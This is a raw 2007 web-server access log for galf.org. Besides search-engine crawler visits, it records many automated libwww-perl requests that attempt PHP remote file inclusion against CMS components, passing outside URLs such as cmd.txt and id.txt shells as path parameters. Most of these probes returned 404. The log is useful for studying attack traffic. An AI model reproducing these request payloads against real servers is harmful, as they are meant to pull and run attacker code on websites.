68.180.250.101 - - [25/Nov/2007:17:32:04 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.80.193.46 - - [25/Nov/2007:17:32:09 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc4; i686 Linux; 20020627)" "www.galf.org"
89.89.224.76 - - [25/Nov/2007:17:32:34 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 9760965 "-" "Wget/1.10.2" "galf.org"
72.9.152.104 - - [25/Nov/2007:17:37:11 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:38:25 -0800] "GET /logs/access_071008.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.81 - - [25/Nov/2007:17:38:37 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.16.18 - - [25/Nov/2007:17:38:59 -0800] "GET /logs/access_070903.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:39:06 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:17:41:16 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:17:41:20 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.16.18 - - [25/Nov/2007:17:41:28 -0800] "GET /logs/access_071022.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
83.143.84.3 - - [25/Nov/2007:17:44:31 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.143.84.3 - - [25/Nov/2007:17:44:36 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.55.208.231 - - [25/Nov/2007:17:45:20 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
217.151.228.18 - - [25/Nov/2007:17:45:23 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dark-unknown.t35.com/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [25/Nov/2007:17:45:25 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dark-unknown.t35.com/cmdtotal.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:46:54 -0800] "GET /logs/access_070625.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:46:54 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:46:55 -0800] "GET /logs/access_070625.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:46:56 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:47:00 -0800] "GET /logs/access_070917.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:47:01 -0800] "GET /logs/access_070917.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:47:32 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:47:32 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:47:32 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:48:18 -0800] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.152.104 - - [25/Nov/2007:17:48:25 -0800] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [25/Nov/2007:17:48:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:48:59 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:48:59 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.205.126.235 - - [25/Nov/2007:17:48:59 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:09 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:09 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:09 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:22 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:22 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:22 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.205.126.235 - - [25/Nov/2007:17:49:30 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:30 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:49:30 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:51:45 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:17:52:19 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:17:52:19 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:17:52:19 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.98.72.98 - - [25/Nov/2007:17:53:38 -0800] "GET //skin/zero_vote/error.php?dir=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.101 - - [25/Nov/2007:17:53:44 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:54:12 -0800] "GET /logs/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.0.200.9 - - [25/Nov/2007:17:54:13 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
83.64.132.254 - - [25/Nov/2007:17:54:19 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.64.132.254 - - [25/Nov/2007:17:54:19 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.64.132.254 - - [25/Nov/2007:17:54:20 -0800] "GET /logs/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.25.80 - - [25/Nov/2007:17:54:35 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:43 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:43 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:43 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.126.235 - - [25/Nov/2007:17:55:44 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.64.132.254 - - [25/Nov/2007:17:56:13 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.64.132.254 - - [25/Nov/2007:17:56:19 -0800] "GET /logs/access_071014.log/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
194.0.200.9 - - [25/Nov/2007:17:56:44 -0800] "GET /logs/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:56:44 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:57:20 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.0.200.9 - - [25/Nov/2007:17:57:21 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.0.200.9 - - [25/Nov/2007:17:57:21 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:17:57:22 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.186.39.203 - - [25/Nov/2007:17:57:54 -0800] "GET //modules/xfsection/modify.php?dir_module=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.143.84.3 - - [25/Nov/2007:17:57:58 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.152.104 - - [25/Nov/2007:17:58:02 -0800] "GET /logs/access_071028.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:58:39 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.173 - - [25/Nov/2007:17:58:45 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:17:59:04 -0800] "GET /////////////phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:00:29 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:00:30 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:00:30 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:01:01 -0800] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
68.180.250.107 - - [25/Nov/2007:18:03:08 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:18:03:14 -0800] "GET /logs/access_070716.log//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:18:03:15 -0800] "GET //mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.94.171 - - [25/Nov/2007:18:03:15 -0800] "GET /logs//mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:03:52 -0800] "GET /logs/access_071028.log/////////////phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:03:53 -0800] "GET /logs/////////////phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:04:01 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.204.56 - - [25/Nov/2007:18:04:22 -0800] "GET /logs/index.php?go=http://www.madinaedu.gov.sa/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.204.56 - - [25/Nov/2007:18:04:22 -0800] "GET /index.php?go=http://www.madinaedu.gov.sa/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:18:04:42 -0800] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:05:44 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
82.149.228.9 - - [25/Nov/2007:18:05:45 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
82.149.228.9 - - [25/Nov/2007:18:05:45 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:05:45 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
194.0.200.9 - - [25/Nov/2007:18:05:46 -0800] "GET /logs/access_071014.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:06:05 -0800] "GET /logs/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
82.149.228.9 - - [25/Nov/2007:18:06:05 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "galf.org"
83.201.30.3 - - [25/Nov/2007:18:06:15 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://dark-unknown.t35.com/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.30.3 - - [25/Nov/2007:18:06:16 -0800] "GET /modules/My_eGallery/index.php?basepath=http://dark-unknown.t35.com/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.30.3 - - [25/Nov/2007:18:06:16 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://dark-unknown.t35.com/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:06:53 -0800] "GET /logs/send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
82.149.228.9 - - [25/Nov/2007:18:06:53 -0800] "GET /send_reminders.php?includedir=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
74.6.22.153 - - [25/Nov/2007:18:10:43 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 1114112 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.120.237.150 - - [25/Nov/2007:18:10:47 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.120.237.150 - - [25/Nov/2007:18:10:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.120.237.150 - - [25/Nov/2007:18:11:30 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.friendsclan.eu//vwar/images/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
82.149.228.9 - - [25/Nov/2007:18:12:08 -0800] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.149.228.9 - - [25/Nov/2007:18:12:44 -0800] "GET /logs/access_071014.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://hypnosis.org/talkback/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
